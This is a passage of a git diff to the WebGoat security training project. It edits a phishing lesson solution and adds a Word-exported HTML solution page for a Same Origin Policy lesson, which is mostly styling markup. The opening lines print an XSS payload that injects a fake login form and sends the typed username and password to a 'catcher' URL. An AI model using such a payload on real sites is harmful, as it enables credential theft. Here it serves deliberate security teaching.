-value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
+&lt;/form&gt;&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
+document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
+User Name = &quot; + document.phish.user.value + &quot;Password = &quot; +  document.phish.pass.value);}
+&lt;/script&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
+&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
+name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
 </p>
 Search for this String and you will see a form asking for your username and password.
-Fill in these fields and click on the Login Button.
+Fill in these fields and click on the Login Button, which completes the lesson.<br/><br/>
+<img src="lesson_solutions/Phishing_files/image001.jpg"><br/>
+<font size="2"><b>New login field after submitting the script.</b></font><br/><br/><br/>
 </body>
 </html>
 
diff --git a/webgoat/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg b/webgoat/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg
new file mode 100644
index 000000000..967ebaa4c
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/SameOriginPolicyProtection.html b/webgoat/src/main/webapp/lesson_solutions/SameOriginPolicyProtection.html
new file mode 100644
index 000000000..59fac9fa5
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_solutions/SameOriginPolicyProtection.html
@@ -0,0 +1,641 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<title>Solution: Same Origin Policy Protection</title>
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>3</o:Revision>
+  <o:TotalTime>54</o:TotalTime>
+  <o:Created>2007-07-11T15:30:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:20:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>607</o:Words>
+  <o:Characters>3461</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>28</o:Lines>
+  <o:Paragraphs>8</o:Paragraphs>
+  <o:CharactersWithSpaces>4060</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:Zoom>90</w:Zoom>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="0" Name="Normal (Web)"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
